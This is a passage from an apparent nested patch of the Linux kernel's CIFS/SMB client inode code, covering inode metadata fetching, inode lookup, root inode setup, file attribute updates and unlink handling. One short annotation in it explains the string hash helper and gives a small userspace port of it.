++	case -EOPNOTSUPP:
++	case -EINVAL:
++		/*
++		 * FIXME: legacy server -- fall back to path-based call?
++		 * for now, just skip revalidating and mark inode for
++		 * immediate reval.
++		 */
++		rc = 0;
++		CIFS_I(inode)->time = 0;
++		goto cgfi_exit;
++	default:
++		goto cgfi_exit;
++	}
++
++	/*
++	 * don't bother with SFU junk here -- just mark inode as needing
++	 * revalidation.
++	 */
++	fattr.cf_uniqueid = CIFS_I(inode)->uniqueid;
++	fattr.cf_flags |= CIFS_FATTR_NEED_REVAL;
++	/* if filetype is different, return error */
++	rc = cifs_fattr_to_inode(inode, &fattr);
++cgfi_exit:
++	cifs_free_open_info(&data);
++	free_xid(xid);
++	return rc;
++}
++
++/* Simple function to return a 64 bit hash of string.  Rarely called */
++static __u64 simple_hashstr(const char *str)
++{
++	const __u64 hash_mult =  1125899906842597ULL; /* a big enough prime */
++	__u64 hash = 0;
++
++	while (*str)
++		hash = (hash + (__u64) *str++) * hash_mult;
++
++	return hash;
++}
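simple_hashstr() above is a plain multiplicative string hash over a large prime, used only to fabricate a stable root inode number when the server hands back 0. It ports to userspace verbatim; a tiny driver hashing a UNC-style string:

  #include <stdint.h>
  #include <stdio.h>

  static uint64_t simple_hashstr(const char *str)
  {
          const uint64_t hash_mult = 1125899906842597ULL;  /* large prime */
          uint64_t hash = 0;

          while (*str)
                  hash = (hash + (uint64_t)*str++) * hash_mult;
          return hash;
  }

  int main(void)
  {
          printf("%llu\n",
                 (unsigned long long)simple_hashstr("\\\\srv\\share"));
          return 0;
  }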
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++/**
++ * cifs_backup_query_path_info - SMB1 fallback code to get ino
++ *
++ * Fallback code to get file metadata when we don't have access to
++ * full_path (EACCES) and have backup creds.
++ *
++ * @xid:	transaction id used to identify original request in logs
++ * @tcon:	information about the server share we have mounted
++ * @sb:	the superblock stores info such as disk space available
++ * @full_path:	name of the file we are getting the metadata for
++ * @resp_buf:	will be set to cifs resp buf and needs to be freed with
++ * 		cifs_buf_release() when done with @data
++ * @data:	will be set to search info result buffer
++ */
++static int
++cifs_backup_query_path_info(int xid,
++			    struct cifs_tcon *tcon,
++			    struct super_block *sb,
++			    const char *full_path,
++			    void **resp_buf,
++			    FILE_ALL_INFO **data)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct cifs_search_info info = {0};
++	u16 flags;
++	int rc;
++
++	*resp_buf = NULL;
++	info.endOfSearch = false;
++	if (tcon->unix_ext)
++		info.info_level = SMB_FIND_FILE_UNIX;
++	else if ((tcon->ses->capabilities &
++		  tcon->ses->server->vals->cap_nt_find) == 0)
++		info.info_level = SMB_FIND_FILE_INFO_STANDARD;
++	else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM)
++		info.info_level = SMB_FIND_FILE_ID_FULL_DIR_INFO;
++	else /* no srvino; a useful fallback for some netapp servers */
++		info.info_level = SMB_FIND_FILE_DIRECTORY_INFO;
++
++	flags = CIFS_SEARCH_CLOSE_ALWAYS |
++		CIFS_SEARCH_CLOSE_AT_END |
++		CIFS_SEARCH_BACKUP_SEARCH;
++
++	rc = CIFSFindFirst(xid, tcon, full_path,
++			   cifs_sb, NULL, flags, &info, false);
++	if (rc)
++		return rc;
++
++	*resp_buf = (void *)info.ntwrk_buf_start;
++	*data = (FILE_ALL_INFO *)info.srch_entries_start;
++	return 0;
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++static void cifs_set_fattr_ino(int xid, struct cifs_tcon *tcon, struct super_block *sb,
++			       struct inode **inode, const char *full_path,
++			       struct cifs_open_info_data *data, struct cifs_fattr *fattr)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct TCP_Server_Info *server = tcon->ses->server;
++	int rc;
++
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM)) {
++		if (*inode)
++			fattr->cf_uniqueid = CIFS_I(*inode)->uniqueid;
++		else
++			fattr->cf_uniqueid = iunique(sb, ROOT_I);
++		return;
++	}
++
++	/*
++	 * If we have an inode, pass a NULL tcon to ensure we don't
++	 * make a round trip to the server. This only works for SMB2+.
++	 */
++	rc = server->ops->get_srv_inum(xid, *inode ? NULL : tcon, cifs_sb, full_path,
++				       &fattr->cf_uniqueid, data);
++	if (rc) {
++		/*
++		 * If that fails, reuse the existing ino or generate a new
++		 * one, and disable server inode numbers
++		 */
++		if (*inode)
++			fattr->cf_uniqueid = CIFS_I(*inode)->uniqueid;
++		else {
++			fattr->cf_uniqueid = iunique(sb, ROOT_I);
++			cifs_autodisable_serverino(cifs_sb);
++		}
++		return;
++	}
++
++	/* If no errors, check for zero root inode (invalid) */
++	if (fattr->cf_uniqueid == 0 && strlen(full_path) == 0) {
++		cifs_dbg(FYI, "Invalid (0) inodenum\n");
++		if (*inode) {
++			/* reuse */
++			fattr->cf_uniqueid = CIFS_I(*inode)->uniqueid;
++		} else {
++			/* make an ino by hashing the UNC */
++			fattr->cf_flags |= CIFS_FATTR_FAKE_ROOT_INO;
++			fattr->cf_uniqueid = simple_hashstr(tcon->tree_name);
++		}
++	}
++}
++
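++/*
++ * Cached metadata is trusted only while we hold a read lease (oplock)
++ * and the attribute cache timestamp has not been zeroed to force
++ * revalidation.
++ */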
++static inline bool is_inode_cache_good(struct inode *ino)
++{
++	return ino && CIFS_CACHE_READ(CIFS_I(ino)) && CIFS_I(ino)->time != 0;
++}
++
++int cifs_get_inode_info(struct inode **inode, const char *full_path,
++			struct cifs_open_info_data *data, struct super_block *sb, int xid,
++			const struct cifs_fid *fid)
++{
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	struct tcon_link *tlink;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	bool adjust_tz = false;
++	struct cifs_fattr fattr = {0};
++	bool is_reparse_point = false;
++	struct cifs_open_info_data tmp_data = {};
++	void *smb1_backup_rsp_buf = NULL;
++	int rc = 0;
++	int tmprc = 0;
++	__u32 reparse_tag = 0;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	tcon = tlink_tcon(tlink);
++	server = tcon->ses->server;
++
++	/*
++	 * 1. Fetch file metadata if not provided (data)
++	 */
++
++	if (!data) {
++		if (is_inode_cache_good(*inode)) {
++			cifs_dbg(FYI, "No need to revalidate cached inode sizes\n");
++			goto out;
++		}
++		rc = server->ops->query_path_info(xid, tcon, cifs_sb, full_path, &tmp_data,
++						  &adjust_tz, &is_reparse_point);
++		data = &tmp_data;
++	}
++
++	/*
++	 * 2. Convert it to internal cifs metadata (fattr)
++	 */
++
++	switch (rc) {
++	case 0:
++		/*
++		 * If the file is a reparse point, it is more complicated
++		 * since we have to check whether its reparse tag matches a
++		 * known special file type, e.g. a symlink, fifo or char device.
++		 */
++		if (is_reparse_point && data->symlink_target) {
++			reparse_tag = IO_REPARSE_TAG_SYMLINK;
++		} else if ((le32_to_cpu(data->fi.Attributes) & ATTR_REPARSE) &&
++			   server->ops->query_reparse_tag) {
++			tmprc = server->ops->query_reparse_tag(xid, tcon, cifs_sb, full_path,
++							    &reparse_tag);
++			if (tmprc)
++				cifs_dbg(FYI, "%s: query_reparse_tag: rc = %d\n", __func__, tmprc);
++			if (server->ops->query_symlink) {
++				tmprc = server->ops->query_symlink(xid, tcon, cifs_sb, full_path,
++								   &data->symlink_target,
++								   is_reparse_point);
++				if (tmprc)
++					cifs_dbg(FYI, "%s: query_symlink: rc = %d\n", __func__,
++						 tmprc);
++			}
++		}
++		cifs_open_info_to_fattr(&fattr, data, sb, adjust_tz, is_reparse_point, reparse_tag);
++		break;
++	case -EREMOTE:
++		/* DFS link, no metadata available on this server */
++		cifs_create_dfs_fattr(&fattr, sb);
++		rc = 0;
++		break;
++	case -EACCES:
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++		/*
++		 * Permission errors; try again with backup flags if possible.
++		 *
++		 * For SMB2 and later the backup intent flag
++		 * is already sent on open when needed, and there
++		 * is no path-based FindFirst operation to use
++		 * to retry with.
++		 */
++		if (backup_cred(cifs_sb) && is_smb1_server(server)) {
++			/* for easier reading */
++			FILE_ALL_INFO *fi;
++			FILE_DIRECTORY_INFO *fdi;
++			SEARCH_ID_FULL_DIR_INFO *si;
++
++			rc = cifs_backup_query_path_info(xid, tcon, sb,
++							 full_path,
++							 &smb1_backup_rsp_buf,
++							 &fi);
++			if (rc)
++				goto out;
++
++			move_cifs_info_to_smb2(&data->fi, fi);
++			fdi = (FILE_DIRECTORY_INFO *)fi;
++			si = (SEARCH_ID_FULL_DIR_INFO *)fi;
++
++			cifs_dir_info_to_fattr(&fattr, fdi, cifs_sb);
++			fattr.cf_uniqueid = le64_to_cpu(si->UniqueId);
++			/* uniqueid set, skip get inum step */
++			goto handle_mnt_opt;
++		} else {
++			/* nothing we can do, bail out */
++			goto out;
++		}
++#else
++		goto out;
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++		break;
++	default:
++		cifs_dbg(FYI, "%s: unhandled err rc %d\n", __func__, rc);
++		goto out;
++	}
++
++	/*
++	 * 3. Get or update inode number (fattr.cf_uniqueid)
++	 */
++
++	cifs_set_fattr_ino(xid, tcon, sb, inode, full_path, data, &fattr);
++
++	/*
++	 * 4. Tweak fattr based on mount options
++	 */
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++handle_mnt_opt:
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++	/* query for SFU type info if supported and needed */
++	if (fattr.cf_cifsattrs & ATTR_SYSTEM &&
++	    cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL) {
++		tmprc = cifs_sfu_type(&fattr, full_path, cifs_sb, xid);
++		if (tmprc)
++			cifs_dbg(FYI, "cifs_sfu_type failed: %d\n", tmprc);
++	}
++
++	/* fill in 0777 bits from ACL */
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MODE_FROM_SID) {
++		rc = cifs_acl_to_fattr(cifs_sb, &fattr, *inode, true,
++				       full_path, fid);
++		if (rc == -EREMOTE)
++			rc = 0;
++		if (rc) {
++			cifs_dbg(FYI, "%s: Get mode from SID failed. rc=%d\n",
++				 __func__, rc);
++			goto out;
++		}
++	} else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_CIFS_ACL) {
++		rc = cifs_acl_to_fattr(cifs_sb, &fattr, *inode, false,
++				       full_path, fid);
++		if (rc == -EREMOTE)
++			rc = 0;
++		if (rc) {
++			cifs_dbg(FYI, "%s: Getting ACL failed with error: %d\n",
++				 __func__, rc);
++			goto out;
++		}
++	}
++
++	/* fill in remaining high mode bits e.g. SUID, VTX */
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL)
++		cifs_sfu_mode(&fattr, full_path, cifs_sb, xid);
++
++	/* check for Minshall+French symlinks */
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MF_SYMLINKS) {
++		tmprc = check_mf_symlink(xid, tcon, cifs_sb, &fattr,
++					 full_path);
++		if (tmprc)
++			cifs_dbg(FYI, "check_mf_symlink: %d\n", tmprc);
++	}
++
++	/*
++	 * 5. Update inode with final fattr data
++	 */
++
++	if (!*inode) {
++		*inode = cifs_iget(sb, &fattr);
++		if (!*inode)
++			rc = -ENOMEM;
++	} else {
++		/* we already have inode, update it */
++
++		/* if uniqueid is different, return error */
++		if (unlikely(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM &&
++		    CIFS_I(*inode)->uniqueid != fattr.cf_uniqueid)) {
++			CIFS_I(*inode)->time = 0; /* force reval */
++			rc = -ESTALE;
++			goto out;
++		}
++		/* if filetype is different, return error */
++		rc = cifs_fattr_to_inode(*inode, &fattr);
++	}
++out:
++	cifs_buf_release(smb1_backup_rsp_buf);
++	cifs_put_tlink(tlink);
++	cifs_free_open_info(&tmp_data);
++	kfree(fattr.cf_symlink_target);
++	return rc;
++}
++
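++/*
++ * SMB3.1.1 POSIX extensions variant of cifs_get_inode_info(): the same
++ * overall fetch/convert/update flow, but using the POSIX query and with
++ * no legacy backup-intent fallback on -EACCES.
++ */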
++int
++smb311_posix_get_inode_info(struct inode **inode,
++		    const char *full_path,
++		    struct super_block *sb, unsigned int xid)
++{
++	struct cifs_tcon *tcon;
++	struct tcon_link *tlink;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	bool adjust_tz = false;
++	struct cifs_fattr fattr = {0};
++	bool symlink = false;
++	struct cifs_open_info_data data = {};
++	int rc = 0;
++	int tmprc = 0;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	tcon = tlink_tcon(tlink);
++
++	/*
++	 * 1. Fetch file metadata
++	 */
++
++	if (is_inode_cache_good(*inode)) {
++		cifs_dbg(FYI, "No need to revalidate cached inode sizes\n");
++		goto out;
++	}
++
++	rc = smb311_posix_query_path_info(xid, tcon, cifs_sb, full_path, &data, &adjust_tz,
++					  &symlink);
++
++	/*
++	 * 2. Convert it to internal cifs metadata (fattr)
++	 */
++
++	switch (rc) {
++	case 0:
++		smb311_posix_info_to_fattr(&fattr, &data, sb, adjust_tz, symlink);
++		break;
++	case -EREMOTE:
++		/* DFS link, no metadata available on this server */
++		cifs_create_dfs_fattr(&fattr, sb);
++		rc = 0;
++		break;
++	case -EACCES:
++		/*
++		 * For SMB2 and later the backup intent flag
++		 * is already sent if needed on open and there
++		 * is no path based FindFirst operation to use
++		 * to retry with so nothing we can do, bail out
++		 */
++		goto out;
++	default:
++		cifs_dbg(FYI, "%s: unhandled err rc %d\n", __func__, rc);
++		goto out;
++	}
++
++	/*
++	 * 3. Tweak fattr based on mount options
++	 */
++
++	/* check for Minshall+French symlinks */
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MF_SYMLINKS) {
++		tmprc = check_mf_symlink(xid, tcon, cifs_sb, &fattr,
++					 full_path);
++		if (tmprc)
++			cifs_dbg(FYI, "check_mf_symlink: %d\n", tmprc);
++	}
++
++	/*
++	 * 4. Update inode with final fattr data
++	 */
++
++	if (!*inode) {
++		*inode = cifs_iget(sb, &fattr);
++		if (!*inode)
++			rc = -ENOMEM;
++	} else {
++		/* we already have inode, update it */
++
++		/* if uniqueid is different, return error */
++		if (unlikely(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM &&
++		    CIFS_I(*inode)->uniqueid != fattr.cf_uniqueid)) {
++			CIFS_I(*inode)->time = 0; /* force reval */
++			rc = -ESTALE;
++			goto out;
++		}
++
++		/* if filetype is different, return error */
++		rc = cifs_fattr_to_inode(*inode, &fattr);
++	}
++out:
++	cifs_put_tlink(tlink);
++	cifs_free_open_info(&data);
++	kfree(fattr.cf_symlink_target);
++	return rc;
++}
++
++static const struct inode_operations cifs_ipc_inode_ops = {
++	.lookup = cifs_lookup,
++};
++
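++/*
++ * Match callback for iget5_locked(): decide whether an existing inode
++ * corresponds to the cifs_fattr passed in @opaque.
++ */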
++static int
++cifs_find_inode(struct inode *inode, void *opaque)
++{
++	struct cifs_fattr *fattr = opaque;
++
++	/* don't match inode with different uniqueid */
++	if (CIFS_I(inode)->uniqueid != fattr->cf_uniqueid)
++		return 0;
++
++	/* use createtime like an i_generation field */
++	if (CIFS_I(inode)->createtime != fattr->cf_createtime)
++		return 0;
++
++	/* don't match inode of different type */
++	if (inode_wrong_type(inode, fattr->cf_mode))
++		return 0;
++
++	/* if it's not a directory or has no dentries, then flag it */
++	if (S_ISDIR(inode->i_mode) && !hlist_empty(&inode->i_dentry))
++		fattr->cf_flags |= CIFS_FATTR_INO_COLLISION;
++
++	return 1;
++}
++
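++/*
++ * Init callback for iget5_locked(): stamp a newly allocated inode with
++ * the server-provided uniqueid and createtime.
++ */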
++static int
++cifs_init_inode(struct inode *inode, void *opaque)
++{
++	struct cifs_fattr *fattr = opaque;
++
++	CIFS_I(inode)->uniqueid = fattr->cf_uniqueid;
++	CIFS_I(inode)->createtime = fattr->cf_createtime;
++	return 0;
++}
++
++/*
++ * walk dentry list for an inode and report whether it has aliases that
++ * are hashed. We use this to determine if a directory inode can actually
++ * be used.
++ */
++static bool
++inode_has_hashed_dentries(struct inode *inode)
++{
++	struct dentry *dentry;
++
++	spin_lock(&inode->i_lock);
++	hlist_for_each_entry(dentry, &inode->i_dentry, d_u.d_alias) {
++		if (!d_unhashed(dentry) || IS_ROOT(dentry)) {
++			spin_unlock(&inode->i_lock);
++			return true;
++		}
++	}
++	spin_unlock(&inode->i_lock);
++	return false;
++}
++
++/* Given fattrs, get a corresponding inode */
++struct inode *
++cifs_iget(struct super_block *sb, struct cifs_fattr *fattr)
++{
++	unsigned long hash;
++	struct inode *inode;
++
++retry_iget5_locked:
++	cifs_dbg(FYI, "looking for uniqueid=%llu\n", fattr->cf_uniqueid);
++
++	/* hash down to 32-bits on 32-bit arch */
++	hash = cifs_uniqueid_to_ino_t(fattr->cf_uniqueid);
++
++	inode = iget5_locked(sb, hash, cifs_find_inode, cifs_init_inode, fattr);
++	if (inode) {
++		/* was there a potentially problematic inode collision? */
++		if (fattr->cf_flags & CIFS_FATTR_INO_COLLISION) {
++			fattr->cf_flags &= ~CIFS_FATTR_INO_COLLISION;
++
++			if (inode_has_hashed_dentries(inode)) {
++				cifs_autodisable_serverino(CIFS_SB(sb));
++				iput(inode);
++				fattr->cf_uniqueid = iunique(sb, ROOT_I);
++				goto retry_iget5_locked;
++			}
++		}
++
++		/* can't fail - see cifs_find_inode() */
++		cifs_fattr_to_inode(inode, fattr);
++		if (sb->s_flags & SB_NOATIME)
++			inode->i_flags |= S_NOATIME | S_NOCMTIME;
++		if (inode->i_state & I_NEW) {
++			inode->i_ino = hash;
++			cifs_fscache_get_inode_cookie(inode);
++			unlock_new_inode(inode);
++		}
++	}
++
++	return inode;
++}
++
++/* gets root inode */
++struct inode *cifs_root_iget(struct super_block *sb)
++{
++	unsigned int xid;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct inode *inode = NULL;
++	long rc;
++	struct cifs_tcon *tcon = cifs_sb_master_tcon(cifs_sb);
++	char *path = NULL;
++	int len;
++
++	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_USE_PREFIX_PATH)
++	    && cifs_sb->prepath) {
++		len = strlen(cifs_sb->prepath);
++		path = kzalloc(len + 2 /* leading sep + null */, GFP_KERNEL);
++		if (path == NULL)
++			return ERR_PTR(-ENOMEM);
++		path[0] = '/';
++		memcpy(path+1, cifs_sb->prepath, len);
++	} else {
++		path = kstrdup("", GFP_KERNEL);
++		if (path == NULL)
++			return ERR_PTR(-ENOMEM);
++	}
++
++	xid = get_xid();
++	if (tcon->unix_ext) {
++		rc = cifs_get_inode_info_unix(&inode, path, sb, xid);
++		/* some servers mistakenly claim POSIX support */
++		if (rc != -EOPNOTSUPP)
++			goto iget_no_retry;
++		cifs_dbg(VFS, "server does not support POSIX extensions\n");
++		tcon->unix_ext = false;
++	}
++
++	convert_delimiter(path, CIFS_DIR_SEP(cifs_sb));
++	if (tcon->posix_extensions)
++		rc = smb311_posix_get_inode_info(&inode, path, sb, xid);
++	else
++		rc = cifs_get_inode_info(&inode, path, NULL, sb, xid, NULL);
++
++iget_no_retry:
++	if (!inode) {
++		inode = ERR_PTR(rc);
++		goto out;
++	}
++
++	if (rc && tcon->pipe) {
++		cifs_dbg(FYI, "ipc connection - fake read inode\n");
++		spin_lock(&inode->i_lock);
++		inode->i_mode |= S_IFDIR;
++		set_nlink(inode, 2);
++		inode->i_op = &cifs_ipc_inode_ops;
++		inode->i_fop = &simple_dir_operations;
++		inode->i_uid = cifs_sb->ctx->linux_uid;
++		inode->i_gid = cifs_sb->ctx->linux_gid;
++		spin_unlock(&inode->i_lock);
++	} else if (rc) {
++		iget_failed(inode);
++		inode = ERR_PTR(rc);
++	}
++
++out:
++	kfree(path);
++	free_xid(xid);
++	return inode;
++}
++
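++/*
++ * Push timestamp and DOS attribute changes to the server through the
++ * protocol's set_file_info operation (FILE_BASIC_INFO).
++ */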
++int
++cifs_set_file_info(struct inode *inode, struct iattr *attrs, unsigned int xid,
++		   const char *full_path, __u32 dosattr)
++{
++	bool set_time = false;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct TCP_Server_Info *server;
++	FILE_BASIC_INFO	info_buf;
++
++	if (attrs == NULL)
++		return -EINVAL;
++
++	server = cifs_sb_master_tcon(cifs_sb)->ses->server;
++	if (!server->ops->set_file_info)
++		return -ENOSYS;
++
++	info_buf.Pad = 0;
++
++	if (attrs->ia_valid & ATTR_ATIME) {
++		set_time = true;
++		info_buf.LastAccessTime =
++			cpu_to_le64(cifs_UnixTimeToNT(attrs->ia_atime));
++	} else
++		info_buf.LastAccessTime = 0;
++
++	if (attrs->ia_valid & ATTR_MTIME) {
++		set_time = true;
++		info_buf.LastWriteTime =
++		    cpu_to_le64(cifs_UnixTimeToNT(attrs->ia_mtime));
++	} else
++		info_buf.LastWriteTime = 0;
++
++	/*
++	 * Samba throws this field away, but Windows may actually use it.
++	 * Do not set ctime unless other time stamps are changed explicitly
++	 * (i.e. by utimes()) since we would then have a mix of client and
++	 * server times.
++	 */
++	if (set_time && (attrs->ia_valid & ATTR_CTIME)) {
++		cifs_dbg(FYI, "CIFS - CTIME changed\n");
++		info_buf.ChangeTime =
++		    cpu_to_le64(cifs_UnixTimeToNT(attrs->ia_ctime));
++	} else
++		info_buf.ChangeTime = 0;
++
++	info_buf.CreationTime = 0;	/* don't change */
++	info_buf.Attributes = cpu_to_le32(dosattr);
++
++	return server->ops->set_file_info(inode, full_path, &info_buf, xid);
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++/*
++ * Open the given file (if it isn't already), set the DELETE_ON_CLOSE bit
++ * and rename it to a random name that hopefully won't conflict with
++ * anything else.
++ */
++int
++cifs_rename_pending_delete(const char *full_path, struct dentry *dentry,
++			   const unsigned int xid)
++{
++	int oplock = 0;
++	int rc;
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++	struct inode *inode = d_inode(dentry);
++	struct cifsInodeInfo *cifsInode = CIFS_I(inode);
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++	__u32 dosattr, origattr;
++	FILE_BASIC_INFO *info_buf = NULL;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	tcon = tlink_tcon(tlink);
++
++	/*
++	 * We cannot rename the file if the server doesn't support
++	 * CAP_INFOLEVEL_PASSTHRU
++	 */
++	if (!(tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)) {
++		rc = -EBUSY;
++		goto out;
++	}
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = DELETE | FILE_WRITE_ATTRIBUTES,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
++		.disposition = FILE_OPEN,
++		.path = full_path,
++		.fid = &fid,
++	};
++
++	rc = CIFS_open(xid, &oparms, &oplock, NULL);
++	if (rc != 0)
++		goto out;
++
++	origattr = cifsInode->cifsAttrs;
++	if (origattr == 0)
++		origattr |= ATTR_NORMAL;
++
++	dosattr = origattr & ~ATTR_READONLY;
++	if (dosattr == 0)
++		dosattr |= ATTR_NORMAL;
++	dosattr |= ATTR_HIDDEN;
++
++	/* set ATTR_HIDDEN and clear ATTR_READONLY, but only if needed */
++	if (dosattr != origattr) {
++		info_buf = kzalloc(sizeof(*info_buf), GFP_KERNEL);
++		if (info_buf == NULL) {
++			rc = -ENOMEM;
++			goto out_close;
++		}
++		info_buf->Attributes = cpu_to_le32(dosattr);
++		rc = CIFSSMBSetFileInfo(xid, tcon, info_buf, fid.netfid,
++					current->tgid);
++		/* although we would like to mark the file hidden,
++		   if that fails we will still try to rename it */
++		if (!rc)
++			cifsInode->cifsAttrs = dosattr;
++		else
++			dosattr = origattr; /* since not able to change them */
++	}
++
++	/* rename the file */
++	rc = CIFSSMBRenameOpenFile(xid, tcon, fid.netfid, NULL,
++				   cifs_sb->local_nls,
++				   cifs_remap(cifs_sb));
++	if (rc != 0) {
++		rc = -EBUSY;
++		goto undo_setattr;
++	}
++
++	/* try to set DELETE_ON_CLOSE */
++	if (!test_bit(CIFS_INO_DELETE_PENDING, &cifsInode->flags)) {
++		rc = CIFSSMBSetFileDisposition(xid, tcon, true, fid.netfid,
++					       current->tgid);
++		/*
++		 * some samba versions return -ENOENT when we try to set the
++		 * file disposition here. Likely a samba bug, but work around
++		 * it for now. This means that some cifsXXX files may hang
++		 * around after they shouldn't.
++		 *
++		 * BB: remove this hack after more servers have the fix
++		 */
++		if (rc == -ENOENT)
++			rc = 0;
++		else if (rc != 0) {
++			rc = -EBUSY;
++			goto undo_rename;
++		}
++		set_bit(CIFS_INO_DELETE_PENDING, &cifsInode->flags);
++	}
++
++out_close:
++	CIFSSMBClose(xid, tcon, fid.netfid);
++out:
++	kfree(info_buf);
++	cifs_put_tlink(tlink);
++	return rc;
++
++	/*
++	 * reset everything back to the original state. Don't bother
++	 * dealing with errors here since we can't do anything about
++	 * them anyway.
++	 */
++undo_rename:
++	CIFSSMBRenameOpenFile(xid, tcon, fid.netfid, dentry->d_name.name,
++				cifs_sb->local_nls, cifs_remap(cifs_sb));
++undo_setattr:
++	if (dosattr != origattr) {
++		info_buf->Attributes = cpu_to_le32(origattr);
++		if (!CIFSSMBSetFileInfo(xid, tcon, info_buf, fid.netfid,
++					current->tgid))
++			cifsInode->cifsAttrs = origattr;
++	}
++
++	goto out_close;
++}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++/* copied from fs/nfs/dir.c with small changes */
++static void
++cifs_drop_nlink(struct inode *inode)
++{
++	spin_lock(&inode->i_lock);
++	if (inode->i_nlink > 0)
++		drop_nlink(inode);
++	spin_unlock(&inode->i_lock);
++}
++
++/*
++ * If d_inode(dentry) is null (usually meaning the cached dentry
++ * is a negative dentry) then we would attempt a standard SMB delete, but
++ * if that fails we cannot attempt the fallback mechanisms on EACCES
++ * and will instead return the EACCES to the caller. Note that the VFS does not call
++ * unlink on negative dentries currently.
++ */
++int cifs_unlink(struct inode *dir, struct dentry *dentry)
++{
++	int rc = 0;
++	unsigned int xid;
++	const char *full_path;
++	void *page;
++	struct inode *inode = d_inode(dentry);
++	struct cifsInodeInfo *cifs_inode;
++	struct super_block *sb = dir->i_sb;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct tcon_link *tlink;
++	struct cifs_tcon *tcon;
++	struct TCP_Server_Info *server;
++	struct iattr *attrs = NULL;
++	__u32 dosattr = 0, origattr = 0;
++
++	cifs_dbg(FYI, "cifs_unlink, dir=0x%p, dentry=0x%p\n", dir, dentry);
++
++	if (unlikely(cifs_forced_shutdown(cifs_sb)))
++		return -EIO;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	tcon = tlink_tcon(tlink);
++	server = tcon->ses->server;
++
++	xid = get_xid();
++	page = alloc_dentry_path();
++
++	if (tcon->nodelete) {
++		rc = -EACCES;
++		goto unlink_out;
++	}
++
++	/* Unlink can be called from rename, so we cannot take the
++	 * sb->s_vfs_rename_mutex here */
++	full_path = build_path_from_dentry(dentry, page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto unlink_out;
++	}
++
++	cifs_close_deferred_file_under_dentry(tcon, full_path);
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	if (cap_unix(tcon->ses) && (CIFS_UNIX_POSIX_PATH_OPS_CAP &
++				le64_to_cpu(tcon->fsUnixInfo.Capability))) {
++		rc = CIFSPOSIXDelFile(xid, tcon, full_path,
++			SMB_POSIX_UNLINK_FILE_TARGET, cifs_sb->local_nls,
++			cifs_remap(cifs_sb));
++		cifs_dbg(FYI, "posix del rc %d\n", rc);
++		if ((rc == 0) || (rc == -ENOENT))
++			goto psx_del_no_retry;
++	}
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++
++retry_std_delete:
++	if (!server->ops->unlink) {
++		rc = -ENOSYS;
++		goto psx_del_no_retry;
++	}
++
++	rc = server->ops->unlink(xid, tcon, full_path, cifs_sb);
++
++psx_del_no_retry:
++	if (!rc) {
++		if (inode)
++			cifs_drop_nlink(inode);
++	} else if (rc == -ENOENT) {
++		d_drop(dentry);
++	} else if (rc == -EBUSY) {
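++		/* file is held open elsewhere: emulate unlink by renaming
++		 * it away and setting DELETE_ON_CLOSE */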
++		if (server->ops->rename_pending_delete) {
++			rc = server->ops->rename_pending_delete(full_path,
++								dentry, xid);
++			if (rc == 0)
++				cifs_drop_nlink(inode);
++		}
++	} else if ((rc == -EACCES) && (dosattr == 0) && inode) {
++		attrs = kzalloc(sizeof(*attrs), GFP_KERNEL);
++		if (attrs == NULL) {
++			rc = -ENOMEM;
++			goto out_reval;
++		}
++
++		/* try to reset dos attributes */
++		cifs_inode = CIFS_I(inode);
++		origattr = cifs_inode->cifsAttrs;
++		if (origattr == 0)
++			origattr |= ATTR_NORMAL;
++		dosattr = origattr & ~ATTR_READONLY;
++		if (dosattr == 0)
++			dosattr |= ATTR_NORMAL;
++		dosattr |= ATTR_HIDDEN;
++
++		rc = cifs_set_file_info(inode, attrs, xid, full_path, dosattr);
++		if (rc != 0)
++			goto out_reval;
++
++		goto retry_std_delete;
++	}
++
++	/* undo the setattr if we errored out and it's needed */
